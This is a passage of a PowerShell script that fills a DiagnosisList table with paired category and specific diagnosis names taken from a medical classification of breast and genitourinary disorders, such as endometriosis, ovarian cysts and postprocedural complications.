$DiagnosisList.Rows.Add("Erectile dysfunction due to diseases classified elsewhere","Erectile dysfunction due to diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Drug-induced erectile dysfunction","Drug-induced erectile dysfunction") + $null = $DiagnosisList.Rows.Add("Postprocedural erectile dysfunction","Erectile dysfunction following radical prostatectomy") + $null = $DiagnosisList.Rows.Add("Postprocedural erectile dysfunction","Erectile dysfunction following radical cystectomy") + $null = $DiagnosisList.Rows.Add("Postprocedural erectile dysfunction","Erectile dysfunction following urethral surgery") + $null = $DiagnosisList.Rows.Add("Postprocedural erectile dysfunction","Erectile dysfunction following simple prostatectomy") + $null = $DiagnosisList.Rows.Add("Postprocedural erectile dysfunction","Erectile dysfunction following radiation therapy") + $null = $DiagnosisList.Rows.Add("Postprocedural erectile dysfunction","Erectile dysfunction following interstitial seed therapy") + $null = $DiagnosisList.Rows.Add("Postprocedural erectile dysfunction","Erectile dysfunction following prostate ablative therapy") + $null = $DiagnosisList.Rows.Add("Postprocedural erectile dysfunction","Other and unspecified postprocedural erectile dysfunction") + $null = $DiagnosisList.Rows.Add("Other male erectile dysfunction","Other male erectile dysfunction") + $null = $DiagnosisList.Rows.Add("Male erectile dysfunction, unspecified","Male erectile dysfunction, unspecified") + $null = $DiagnosisList.Rows.Add("Ejaculatory dysfunction","Retarded ejaculation") + $null = $DiagnosisList.Rows.Add("Ejaculatory dysfunction","Painful ejaculation") + $null = $DiagnosisList.Rows.Add("Ejaculatory dysfunction","Anejaculatory orgasm") + $null = $DiagnosisList.Rows.Add("Ejaculatory dysfunction","Retrograde ejaculation") + $null = $DiagnosisList.Rows.Add("Ejaculatory dysfunction","Other ejaculatory dysfunction") + $null = $DiagnosisList.Rows.Add("Other male sexual dysfunction","Other male sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Unspecified male sexual dysfunction","Unspecified male sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Solitary cyst of breast","Solitary cyst of right breast") + $null = $DiagnosisList.Rows.Add("Solitary cyst of breast","Solitary cyst of left breast") + $null = $DiagnosisList.Rows.Add("Solitary cyst of breast","Solitary cyst of unspecified breast") + $null = $DiagnosisList.Rows.Add("Diffuse cystic mastopathy","Diffuse cystic mastopathy of right breast") + $null = $DiagnosisList.Rows.Add("Diffuse cystic mastopathy","Diffuse cystic mastopathy of left breast") + $null = $DiagnosisList.Rows.Add("Diffuse cystic mastopathy","Diffuse cystic mastopathy of unspecified breast") + $null = $DiagnosisList.Rows.Add("Fibroadenosis of breast","Fibroadenosis of right breast") + $null = $DiagnosisList.Rows.Add("Fibroadenosis of breast","Fibroadenosis of left breast") + $null = $DiagnosisList.Rows.Add("Fibroadenosis of breast","Fibroadenosis of unspecified breast") + $null = $DiagnosisList.Rows.Add("Fibrosclerosis of breast","Fibrosclerosis of right breast") + $null = $DiagnosisList.Rows.Add("Fibrosclerosis of breast","Fibrosclerosis of left breast") + $null = $DiagnosisList.Rows.Add("Fibrosclerosis of breast","Fibrosclerosis of unspecified breast") + $null = $DiagnosisList.Rows.Add("Mammary duct ectasia","Mammary duct ectasia of right breast") + $null = $DiagnosisList.Rows.Add("Mammary duct ectasia","Mammary duct ectasia of left breast") + $null = $DiagnosisList.Rows.Add("Mammary duct ectasia","Mammary duct ectasia of unspecified breast") + $null = $DiagnosisList.Rows.Add("Other benign mammary dysplasias","Other benign mammary dysplasias of right breast") + $null = $DiagnosisList.Rows.Add("Other benign mammary dysplasias","Other benign mammary dysplasias of left breast") + $null = $DiagnosisList.Rows.Add("Other benign mammary dysplasias","Other benign mammary dysplasias of unspecified breast") + $null = $DiagnosisList.Rows.Add("Unspecified benign mammary dysplasia","Unspecified benign mammary dysplasia of right breast") + $null = $DiagnosisList.Rows.Add("Unspecified benign mammary dysplasia","Unspecified benign mammary dysplasia of left breast") + $null = $DiagnosisList.Rows.Add("Unspecified benign mammary dysplasia","Unspecified benign mammary dysplasia of unspecified breast") + $null = $DiagnosisList.Rows.Add("Inflammatory disorders of breast","Mastitis without abscess") + $null = $DiagnosisList.Rows.Add("Inflammatory disorders of breast","Abscess of the breast and nipple") + $null = $DiagnosisList.Rows.Add("Hypertrophy of breast","Hypertrophy of breast") + $null = $DiagnosisList.Rows.Add("Unspecified lump in breast","Unspecified lump in unspecified breast") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the right breast","Unspecified lump in the right breast, unspecified quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the right breast","Unspecified lump in the right breast, upper outer quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the right breast","Unspecified lump in the right breast, upper inner quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the right breast","Unspecified lump in the right breast, lower outer quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the right breast","Unspecified lump in the right breast, lower inner quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the left breast","Unspecified lump in the left breast, unspecified quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the left breast","Unspecified lump in the left breast, upper outer quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the left breast","Unspecified lump in the left breast, upper inner quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the left breast","Unspecified lump in the left breast, lower outer quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in the left breast","Unspecified lump in the left breast, lower inner quadrant") + $null = $DiagnosisList.Rows.Add("Unspecified lump in axillary tail","Unspecified lump in axillary tail of the right breast") + $null = $DiagnosisList.Rows.Add("Unspecified lump in axillary tail","Unspecified lump in axillary tail of the left breast") + $null = $DiagnosisList.Rows.Add("Unspecified lump in breast, subareolar","Unspecified lump in right breast, subareolar") + $null = $DiagnosisList.Rows.Add("Unspecified lump in breast, subareolar","Unspecified lump in left breast, subareolar") + $null = $DiagnosisList.Rows.Add("Other disorders of breast","Fissure and fistula of nipple") + $null = $DiagnosisList.Rows.Add("Other disorders of breast","Fat necrosis of breast") + $null = $DiagnosisList.Rows.Add("Other disorders of breast","Atrophy of breast") + $null = $DiagnosisList.Rows.Add("Other disorders of breast","Galactorrhea not associated with childbirth") + $null = $DiagnosisList.Rows.Add("Other disorders of breast","Mastodynia") + $null = $DiagnosisList.Rows.Add("Other signs and symptoms in breast","Induration of breast") + $null = $DiagnosisList.Rows.Add("Other signs and symptoms in breast","Nipple discharge") + $null = $DiagnosisList.Rows.Add("Other signs and symptoms in breast","Retraction of nipple") + $null = $DiagnosisList.Rows.Add("Other signs and symptoms in breast","Other signs and symptoms in breast") + $null = $DiagnosisList.Rows.Add("Other specified disorders of breast","Ptosis of breast") + $null = $DiagnosisList.Rows.Add("Other specified disorders of breast","Hypoplasia of breast") + $null = $DiagnosisList.Rows.Add("Other specified disorders of breast","Other specified disorders of breast") + $null = $DiagnosisList.Rows.Add("Disorder of breast, unspecified","Disorder of breast, unspecified") + $null = $DiagnosisList.Rows.Add("Deformity and disproportion of reconstructed breast","Deformity of reconstructed breast") + $null = $DiagnosisList.Rows.Add("Deformity and disproportion of reconstructed breast","Disproportion of reconstructed breast") + $null = $DiagnosisList.Rows.Add("Acute salpingitis and oophoritis","Acute salpingitis") + $null = $DiagnosisList.Rows.Add("Acute salpingitis and oophoritis","Acute oophoritis") + $null = $DiagnosisList.Rows.Add("Acute salpingitis and oophoritis","Acute salpingitis and oophoritis") + $null = $DiagnosisList.Rows.Add("Chronic salpingitis and oophoritis","Chronic salpingitis") + $null = $DiagnosisList.Rows.Add("Chronic salpingitis and oophoritis","Chronic oophoritis") + $null = $DiagnosisList.Rows.Add("Chronic salpingitis and oophoritis","Chronic salpingitis and oophoritis") + $null = $DiagnosisList.Rows.Add("Salpingitis and oophoritis, unspecified","Salpingitis, unspecified") + $null = $DiagnosisList.Rows.Add("Salpingitis and oophoritis, unspecified","Oophoritis, unspecified") + $null = $DiagnosisList.Rows.Add("Salpingitis and oophoritis, unspecified","Salpingitis and oophoritis, unspecified") + $null = $DiagnosisList.Rows.Add("Inflammatory disease of uterus, except cervix","Acute inflammatory disease of uterus") + $null = $DiagnosisList.Rows.Add("Inflammatory disease of uterus, except cervix","Chronic inflammatory disease of uterus") + $null = $DiagnosisList.Rows.Add("Inflammatory disease of uterus, except cervix","Inflammatory disease of uterus, unspecified") + $null = $DiagnosisList.Rows.Add("Inflammatory disease of cervix uteri","Inflammatory disease of cervix uteri") + $null = $DiagnosisList.Rows.Add("Other female pelvic inflammatory diseases","Acute parametritis and pelvic cellulitis") + $null = $DiagnosisList.Rows.Add("Other female pelvic inflammatory diseases","Chronic parametritis and pelvic cellulitis") + $null = $DiagnosisList.Rows.Add("Other female pelvic inflammatory diseases","Unspecified parametritis and pelvic cellulitis") + $null = $DiagnosisList.Rows.Add("Other female pelvic inflammatory diseases","Female acute pelvic peritonitis") + $null = $DiagnosisList.Rows.Add("Other female pelvic inflammatory diseases","Female chronic pelvic peritonitis") + $null = $DiagnosisList.Rows.Add("Other female pelvic inflammatory diseases","Female pelvic peritonitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other female pelvic inflammatory diseases","Female pelvic peritoneal adhesions (postinfective)") + $null = $DiagnosisList.Rows.Add("Other female pelvic inflammatory diseases","Other specified female pelvic inflammatory diseases") + $null = $DiagnosisList.Rows.Add("Other female pelvic inflammatory diseases","Female pelvic inflammatory disease, unspecified") + $null = $DiagnosisList.Rows.Add("Female pelvic inflammatory disorders in diseases classified elsewhere","Female pelvic inflammatory disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Diseases of Bartholin's gland","Cyst of Bartholin's gland") + $null = $DiagnosisList.Rows.Add("Diseases of Bartholin's gland","Abscess of Bartholin's gland") + $null = $DiagnosisList.Rows.Add("Diseases of Bartholin's gland","Other diseases of Bartholin's gland") + $null = $DiagnosisList.Rows.Add("Diseases of Bartholin's gland","Disease of Bartholin's gland, unspecified") + $null = $DiagnosisList.Rows.Add("Other inflammation of vagina and vulva","Acute vaginitis") + $null = $DiagnosisList.Rows.Add("Other inflammation of vagina and vulva","Subacute and chronic vaginitis") + $null = $DiagnosisList.Rows.Add("Other inflammation of vagina and vulva","Acute vulvitis") + $null = $DiagnosisList.Rows.Add("Other inflammation of vagina and vulva","Subacute and chronic vulvitis") + $null = $DiagnosisList.Rows.Add("Other inflammation of vagina and vulva","Abscess of vulva") + $null = $DiagnosisList.Rows.Add("Other inflammation of vagina and vulva","Ulceration of vagina") + $null = $DiagnosisList.Rows.Add("Other inflammation of vagina and vulva","Ulceration of vulva") + $null = $DiagnosisList.Rows.Add("Other specified inflammation of vagina and vulva","Mucositis (ulcerative) of vagina and vulva") + $null = $DiagnosisList.Rows.Add("Other specified inflammation of vagina and vulva","Other specified inflammation of vagina and vulva") + $null = $DiagnosisList.Rows.Add("Vulvovaginal ulceration and inflammation in diseases classified elsewhere","Ulceration of vulva in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Vulvovaginal ulceration and inflammation in diseases classified elsewhere","Vaginitis, vulvitis and vulvovaginitis in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Endometriosis","Endometriosis of uterus") + $null = $DiagnosisList.Rows.Add("Endometriosis","Endometriosis of ovary") + $null = $DiagnosisList.Rows.Add("Endometriosis","Endometriosis of fallopian tube") + $null = $DiagnosisList.Rows.Add("Endometriosis","Endometriosis of pelvic peritoneum") + $null = $DiagnosisList.Rows.Add("Endometriosis","Endometriosis of rectovaginal septum and vagina") + $null = $DiagnosisList.Rows.Add("Endometriosis","Endometriosis of intestine") + $null = $DiagnosisList.Rows.Add("Endometriosis","Endometriosis in cutaneous scar") + $null = $DiagnosisList.Rows.Add("Endometriosis","Other endometriosis") + $null = $DiagnosisList.Rows.Add("Endometriosis","Endometriosis, unspecified") + $null = $DiagnosisList.Rows.Add("Female genital prolapse","Urethrocele") + $null = $DiagnosisList.Rows.Add("Cystocele","Cystocele, unspecified") + $null = $DiagnosisList.Rows.Add("Cystocele","Cystocele, midline") + $null = $DiagnosisList.Rows.Add("Cystocele","Cystocele, lateral") + $null = $DiagnosisList.Rows.Add("Incomplete uterovaginal prolapse","Incomplete uterovaginal prolapse") + $null = $DiagnosisList.Rows.Add("Complete uterovaginal prolapse","Complete uterovaginal prolapse") + $null = $DiagnosisList.Rows.Add("Uterovaginal prolapse, unspecified","Uterovaginal prolapse, unspecified") + $null = $DiagnosisList.Rows.Add("Vaginal enterocele","Vaginal enterocele") + $null = $DiagnosisList.Rows.Add("Rectocele","Rectocele") + $null = $DiagnosisList.Rows.Add("Other female genital prolapse","Perineocele") + $null = $DiagnosisList.Rows.Add("Other female genital prolapse","Incompetence or weakening of pubocervical tissue") + $null = $DiagnosisList.Rows.Add("Other female genital prolapse","Incompetence or weakening of rectovaginal tissue") + $null = $DiagnosisList.Rows.Add("Other female genital prolapse","Pelvic muscle wasting") + $null = $DiagnosisList.Rows.Add("Other female genital prolapse","Cervical stump prolapse") + $null = $DiagnosisList.Rows.Add("Other female genital prolapse","Other female genital prolapse") + $null = $DiagnosisList.Rows.Add("Female genital prolapse, unspecified","Female genital prolapse, unspecified") + $null = $DiagnosisList.Rows.Add("Fistulae involving female genital tract","Vesicovaginal fistula") + $null = $DiagnosisList.Rows.Add("Fistulae involving female genital tract","Other female urinary-genital tract fistulae") + $null = $DiagnosisList.Rows.Add("Fistulae involving female genital tract","Fistula of vagina to small intestine") + $null = $DiagnosisList.Rows.Add("Fistulae involving female genital tract","Fistula of vagina to large intestine") + $null = $DiagnosisList.Rows.Add("Fistulae involving female genital tract","Other female intestinal-genital tract fistulae") + $null = $DiagnosisList.Rows.Add("Fistulae involving female genital tract","Female genital tract-skin fistulae") + $null = $DiagnosisList.Rows.Add("Fistulae involving female genital tract","Other female genital tract fistulae") + $null = $DiagnosisList.Rows.Add("Fistulae involving female genital tract","Female genital tract fistula, unspecified") + $null = $DiagnosisList.Rows.Add("Follicular cyst of ovary","Follicular cyst of ovary, unspecified side") + $null = $DiagnosisList.Rows.Add("Follicular cyst of ovary","Follicular cyst of right ovary") + $null = $DiagnosisList.Rows.Add("Follicular cyst of ovary","Follicular cyst of left ovary") + $null = $DiagnosisList.Rows.Add("Corpus luteum cyst","Corpus luteum cyst of ovary, unspecified side") + $null = $DiagnosisList.Rows.Add("Corpus luteum cyst","Corpus luteum cyst of right ovary") + $null = $DiagnosisList.Rows.Add("Corpus luteum cyst","Corpus luteum cyst of left ovary") + $null = $DiagnosisList.Rows.Add("Unspecified ovarian cysts","Unspecified ovarian cyst, right side") + $null = $DiagnosisList.Rows.Add("Unspecified ovarian cysts","Unspecified ovarian cyst, left side") + $null = $DiagnosisList.Rows.Add("Unspecified ovarian cysts","Unspecified ovarian cyst, unspecified side") + $null = $DiagnosisList.Rows.Add("Other ovarian cysts","Other ovarian cyst, right side") + $null = $DiagnosisList.Rows.Add("Other ovarian cysts","Other ovarian cyst, left side") + $null = $DiagnosisList.Rows.Add("Other ovarian cysts","Other ovarian cyst, unspecified side") + $null = $DiagnosisList.Rows.Add("Acquired atrophy of ovary","Acquired atrophy of right ovary") + $null = $DiagnosisList.Rows.Add("Acquired atrophy of ovary","Acquired atrophy of left ovary") + $null = $DiagnosisList.Rows.Add("Acquired atrophy of ovary","Acquired atrophy of ovary, unspecified side") + $null = $DiagnosisList.Rows.Add("Acquired atrophy of fallopian tube","Acquired atrophy of right fallopian tube") + $null = $DiagnosisList.Rows.Add("Acquired atrophy of fallopian tube","Acquired atrophy of left fallopian tube") + $null = $DiagnosisList.Rows.Add("Acquired atrophy of fallopian tube","Acquired atrophy of fallopian tube, unspecified side") + $null = $DiagnosisList.Rows.Add("Acquired atrophy of ovary and fallopian tube","Acquired atrophy of right ovary and fallopian tube") + $null = $DiagnosisList.Rows.Add("Acquired atrophy of ovary and fallopian tube","Acquired atrophy of left ovary and fallopian tube") + $null = $DiagnosisList.Rows.Add("Acquired atrophy of ovary and fallopian tube","Acquired atrophy of ovary and fallopian tube, unspecified side") + $null = $DiagnosisList.Rows.Add("Prolapse and hernia of ovary and fallopian tube","Prolapse and hernia of ovary and fallopian tube, unspecified side") + $null = $DiagnosisList.Rows.Add("Prolapse and hernia of ovary and fallopian tube","Prolapse and hernia of right ovary and fallopian tube") + $null = $DiagnosisList.Rows.Add("Prolapse and hernia of ovary and fallopian tube","Prolapse and hernia of left ovary and fallopian tube") + $null = $DiagnosisList.Rows.Add("Torsion of ovary and ovarian pedicle","Torsion of right ovary and ovarian pedicle") + $null = $DiagnosisList.Rows.Add("Torsion of ovary and ovarian pedicle","Torsion of left ovary and ovarian pedicle") + $null = $DiagnosisList.Rows.Add("Torsion of ovary and ovarian pedicle","Torsion of ovary and ovarian pedicle, unspecified side") + $null = $DiagnosisList.Rows.Add("Torsion of fallopian tube","Torsion of right fallopian tube") + $null = $DiagnosisList.Rows.Add("Torsion of fallopian tube","Torsion of left fallopian tube") + $null = $DiagnosisList.Rows.Add("Torsion of fallopian tube","Torsion of fallopian tube, unspecified side") + $null = $DiagnosisList.Rows.Add("Torsion of ovary, ovarian pedicle and fallopian tube","Torsion of ovary, ovarian pedicle and fallopian tube") + $null = $DiagnosisList.Rows.Add("Hematosalpinx","Hematosalpinx") + $null = $DiagnosisList.Rows.Add("Hematoma of broad ligament","Hematoma of broad ligament") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of ovary, fallopian tube and broad ligament","Other noninflammatory disorders of ovary, fallopian tube and broad ligament") + $null = $DiagnosisList.Rows.Add("Noninflammatory disorder of ovary, fallopian tube and broad ligament, unspecified","Noninflammatory disorder of ovary, fallopian tube and broad ligament, unspecified") + $null = $DiagnosisList.Rows.Add("Polyp of female genital tract","Polyp of corpus uteri") + $null = $DiagnosisList.Rows.Add("Polyp of female genital tract","Polyp of cervix uteri") + $null = $DiagnosisList.Rows.Add("Polyp of female genital tract","Polyp of vagina") + $null = $DiagnosisList.Rows.Add("Polyp of female genital tract","Polyp of vulva") + $null = $DiagnosisList.Rows.Add("Polyp of female genital tract","Polyp of other parts of female genital tract") + $null = $DiagnosisList.Rows.Add("Polyp of female genital tract","Polyp of female genital tract, unspecified") + $null = $DiagnosisList.Rows.Add("Endometrial hyperplasia","Endometrial hyperplasia, unspecified") + $null = $DiagnosisList.Rows.Add("Endometrial hyperplasia","Benign endometrial hyperplasia") + $null = $DiagnosisList.Rows.Add("Endometrial hyperplasia","Endometrial intraepithelial neoplasia [EIN]") + $null = $DiagnosisList.Rows.Add("Hypertrophy of uterus","Hypertrophy of uterus") + $null = $DiagnosisList.Rows.Add("Subinvolution of uterus","Subinvolution of uterus") + $null = $DiagnosisList.Rows.Add("Malposition of uterus","Malposition of uterus") + $null = $DiagnosisList.Rows.Add("Inversion of uterus","Inversion of uterus") + $null = $DiagnosisList.Rows.Add("Intrauterine synechiae","Intrauterine synechiae") + $null = $DiagnosisList.Rows.Add("Hematometra","Hematometra") + $null = $DiagnosisList.Rows.Add("Other specified noninflammatory disorders of uterus","Other specified noninflammatory disorders of uterus") + $null = $DiagnosisList.Rows.Add("Noninflammatory disorder of uterus, unspecified","Noninflammatory disorder of uterus, unspecified") + $null = $DiagnosisList.Rows.Add("Erosion and ectropion of cervix uteri","Erosion and ectropion of cervix uteri") + $null = $DiagnosisList.Rows.Add("Dysplasia of cervix uteri","Mild cervical dysplasia") + $null = $DiagnosisList.Rows.Add("Dysplasia of cervix uteri","Moderate cervical dysplasia") + $null = $DiagnosisList.Rows.Add("Dysplasia of cervix uteri","Dysplasia of cervix uteri, unspecified") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of cervix uteri","Leukoplakia of cervix uteri") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of cervix uteri","Old laceration of cervix uteri") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of cervix uteri","Stricture and stenosis of cervix uteri") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of cervix uteri","Incompetence of cervix uteri") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of cervix uteri","Hypertrophic elongation of cervix uteri") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of cervix uteri","Other specified noninflammatory disorders of cervix uteri") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of cervix uteri","Noninflammatory disorder of cervix uteri, unspecified") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vagina","Mild vaginal dysplasia") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vagina","Moderate vaginal dysplasia") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vagina","Dysplasia of vagina, unspecified") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vagina","Leukoplakia of vagina") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vagina","Stricture and atresia of vagina") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vagina","Tight hymenal ring") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vagina","Hematocolpos") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vagina","Other specified noninflammatory disorders of vagina") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vagina","Noninflammatory disorder of vagina, unspecified") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vulva and perineum","Mild vulvar dysplasia") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vulva and perineum","Moderate vulvar dysplasia") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vulva and perineum","Dysplasia of vulva, unspecified") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vulva and perineum","Leukoplakia of vulva") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of vulva and perineum","Atrophy of vulva") + $null = $DiagnosisList.Rows.Add("Hypertrophy of vulva","Unspecified hypertrophy of vulva") + $null = $DiagnosisList.Rows.Add("Hypertrophy of vulva","Childhood asymmetric labium majus enlargement") + $null = $DiagnosisList.Rows.Add("Hypertrophy of vulva","Other specified hypertrophy of vulva") + $null = $DiagnosisList.Rows.Add("Vulvar cyst","Vulvar cyst") + $null = $DiagnosisList.Rows.Add("Female genital mutilation status","Female genital mutilation status, unspecified") + $null = $DiagnosisList.Rows.Add("Female genital mutilation status","Female genital mutilation Type I status") + $null = $DiagnosisList.Rows.Add("Female genital mutilation status","Female genital mutilation Type II status") + $null = $DiagnosisList.Rows.Add("Female genital mutilation status","Female genital mutilation Type III status") + $null = $DiagnosisList.Rows.Add("Female genital mutilation status","Other female genital mutilation status") + $null = $DiagnosisList.Rows.Add("Other specified noninflammatory disorders of vulva and perineum","Other specified noninflammatory disorders of vulva and perineum") + $null = $DiagnosisList.Rows.Add("Noninflammatory disorder of vulva and perineum, unspecified","Noninflammatory disorder of vulva and perineum, unspecified") + $null = $DiagnosisList.Rows.Add("Absent, scanty and rare menstruation","Primary amenorrhea") + $null = $DiagnosisList.Rows.Add("Absent, scanty and rare menstruation","Secondary amenorrhea") + $null = $DiagnosisList.Rows.Add("Absent, scanty and rare menstruation","Amenorrhea, unspecified") + $null = $DiagnosisList.Rows.Add("Absent, scanty and rare menstruation","Primary oligomenorrhea") + $null = $DiagnosisList.Rows.Add("Absent, scanty and rare menstruation","Secondary oligomenorrhea") + $null = $DiagnosisList.Rows.Add("Absent, scanty and rare menstruation","Oligomenorrhea, unspecified") + $null = $DiagnosisList.Rows.Add("Excessive, frequent and irregular menstruation","Excessive and frequent menstruation with regular cycle") + $null = $DiagnosisList.Rows.Add("Excessive, frequent and irregular menstruation","Excessive and frequent menstruation with irregular cycle") + $null = $DiagnosisList.Rows.Add("Excessive, frequent and irregular menstruation","Excessive menstruation at puberty") + $null = $DiagnosisList.Rows.Add("Excessive, frequent and irregular menstruation","Ovulation bleeding") + $null = $DiagnosisList.Rows.Add("Excessive, frequent and irregular menstruation","Excessive bleeding in the premenopausal period") + $null = $DiagnosisList.Rows.Add("Excessive, frequent and irregular menstruation","Other specified irregular menstruation") + $null = $DiagnosisList.Rows.Add("Excessive, frequent and irregular menstruation","Irregular menstruation, unspecified") + $null = $DiagnosisList.Rows.Add("Other abnormal uterine and vaginal bleeding","Postcoital and contact bleeding") + $null = $DiagnosisList.Rows.Add("Other abnormal uterine and vaginal bleeding","Pre-pubertal vaginal bleeding") + $null = $DiagnosisList.Rows.Add("Other abnormal uterine and vaginal bleeding","Other specified abnormal uterine and vaginal bleeding") + $null = $DiagnosisList.Rows.Add("Other abnormal uterine and vaginal bleeding","Abnormal uterine and vaginal bleeding, unspecified") + $null = $DiagnosisList.Rows.Add("Pain and other conditions associated with female genital organs and menstrual cycle","Mittelschmerz") + $null = $DiagnosisList.Rows.Add("Dyspareunia","Unspecified dyspareunia") + $null = $DiagnosisList.Rows.Add("Dyspareunia","Superficial (introital) dyspareunia") + $null = $DiagnosisList.Rows.Add("Dyspareunia","Deep dyspareunia") + $null = $DiagnosisList.Rows.Add("Dyspareunia","Other specified dyspareunia") + $null = $DiagnosisList.Rows.Add("Vaginismus","Vaginismus") + $null = $DiagnosisList.Rows.Add("Premenstrual tension syndrome","Premenstrual tension syndrome") + $null = $DiagnosisList.Rows.Add("Primary dysmenorrhea","Primary dysmenorrhea") + $null = $DiagnosisList.Rows.Add("Secondary dysmenorrhea","Secondary dysmenorrhea") + $null = $DiagnosisList.Rows.Add("Dysmenorrhea, unspecified","Dysmenorrhea, unspecified") + $null = $DiagnosisList.Rows.Add("Vulvodynia","Vulvar vestibulitis") + $null = $DiagnosisList.Rows.Add("Vulvodynia","Other vulvodynia") + $null = $DiagnosisList.Rows.Add("Vulvodynia","Vulvodynia, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified conditions associated with female genital organs and menstrual cycle","Other specified conditions associated with female genital organs and menstrual cycle") + $null = $DiagnosisList.Rows.Add("Unspecified condition associated with female genital organs and menstrual cycle","Unspecified condition associated with female genital organs and menstrual cycle") + $null = $DiagnosisList.Rows.Add("Menopausal and other perimenopausal disorders","Postmenopausal bleeding") + $null = $DiagnosisList.Rows.Add("Menopausal and other perimenopausal disorders","Menopausal and female climacteric states") + $null = $DiagnosisList.Rows.Add("Menopausal and other perimenopausal disorders","Postmenopausal atrophic vaginitis") + $null = $DiagnosisList.Rows.Add("Menopausal and other perimenopausal disorders","Other specified menopausal and perimenopausal disorders") + $null = $DiagnosisList.Rows.Add("Menopausal and other perimenopausal disorders","Unspecified menopausal and perimenopausal disorder") + $null = $DiagnosisList.Rows.Add("Recurrent pregnancy loss","Recurrent pregnancy loss") + $null = $DiagnosisList.Rows.Add("Female infertility","Female infertility associated with anovulation") + $null = $DiagnosisList.Rows.Add("Female infertility","Female infertility of tubal origin") + $null = $DiagnosisList.Rows.Add("Female infertility","Female infertility of uterine origin") + $null = $DiagnosisList.Rows.Add("Female infertility","Female infertility of other origin") + $null = $DiagnosisList.Rows.Add("Female infertility","Female infertility, unspecified") + $null = $DiagnosisList.Rows.Add("Complications associated with artificial fertilization","Infection associated with artificial insemination") + $null = $DiagnosisList.Rows.Add("Complications associated with artificial fertilization","Hyperstimulation of ovaries") + $null = $DiagnosisList.Rows.Add("Complications associated with artificial fertilization","Complications of attempted introduction of fertilized ovum following in vitro fertilization") + $null = $DiagnosisList.Rows.Add("Complications associated with artificial fertilization","Complications of attempted introduction of embryo in embryo transfer") + $null = $DiagnosisList.Rows.Add("Complications associated with artificial fertilization","Other complications associated with artificial fertilization") + $null = $DiagnosisList.Rows.Add("Complications associated with artificial fertilization","Complication associated with artificial fertilization, unspecified") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of genitourinary system, not elsewhere classified","Postprocedural (acute) (chronic) kidney failure") + $null = $DiagnosisList.Rows.Add("Postprocedural urethral stricture, male","Postprocedural urethral stricture, male, meatal") + $null = $DiagnosisList.Rows.Add("Postprocedural urethral stricture, male","Postprocedural bulbous urethral stricture, male") + $null = $DiagnosisList.Rows.Add("Postprocedural urethral stricture, male","Postprocedural membranous urethral stricture, male") + $null = $DiagnosisList.Rows.Add("Postprocedural urethral stricture, male","Postprocedural anterior bulbous urethral stricture, male") + $null = $DiagnosisList.Rows.Add("Postprocedural urethral stricture, male","Postprocedural urethral stricture, male, unspecified") + $null = $DiagnosisList.Rows.Add("Postprocedural urethral stricture, male","Postprocedural fossa navicularis urethral stricture") + $null = $DiagnosisList.Rows.Add("Postprocedural urethral stricture, female","Postprocedural urethral stricture, female") + $null = $DiagnosisList.Rows.Add("Postprocedural adhesions of vagina","Postprocedural adhesions of vagina") + $null = $DiagnosisList.Rows.Add("Prolapse of vaginal vault after hysterectomy","Prolapse of vaginal vault after hysterectomy") + $null = $DiagnosisList.Rows.Add("Postprocedural pelvic peritoneal adhesions","Postprocedural pelvic peritoneal adhesions") + $null = $DiagnosisList.Rows.Add("Complication of cystostomy","Cystostomy hemorrhage") + $null = $DiagnosisList.Rows.Add("Complication of cystostomy","Cystostomy infection") + $null = $DiagnosisList.Rows.Add("Complication of cystostomy","Cystostomy malfunction") + $null = $DiagnosisList.Rows.Add("Complication of cystostomy","Other cystostomy complication") + $null = $DiagnosisList.Rows.Add("Complication of incontinent external stoma of urinary tract","Hemorrhage of incontinent external stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of incontinent external stoma of urinary tract","Infection of incontinent external stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of incontinent external stoma of urinary tract","Malfunction of incontinent external stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of incontinent external stoma of urinary tract","Herniation of incontinent stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of incontinent external stoma of urinary tract","Stenosis of incontinent stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of incontinent external stoma of urinary tract","Other complication of incontinent external stoma of urinary tract") + $null = 